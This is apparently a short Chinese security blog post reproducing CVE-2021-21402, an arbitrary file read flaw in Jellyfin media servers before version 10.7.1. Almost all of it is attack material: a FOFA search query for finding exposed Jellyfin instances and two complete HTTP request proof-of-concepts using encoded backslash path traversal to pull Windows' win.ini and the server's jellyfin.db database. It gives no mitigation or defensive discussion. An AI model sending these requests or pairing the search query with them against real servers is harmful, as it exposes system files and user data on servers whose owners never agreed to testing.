剑胆琴心

剑胆琴心

潜心学习,去成为你想成为的人

Jellyfin任意文件读取漏洞复现(CVE-2021-21402)

影响版本: Jellyfin<10.7.1 复现 fofa语法 1 title="Jellyfin" POC 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 # poc_1 GET /Audio/1/hls/..%5C..%5C..%5C..%5C..%5C..%5CWindows%5Cwin.ini/stream.mp3/ Host:xxx.xxx.xxx.xxx Content-Type: application/octet-stream # poc_2 GET /Audio/anything/hls/..%5Cdata%5Cjellyfin.db/stream.mp3/ HTTP/1.1 Host: x.x.x.x:5577 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)
0%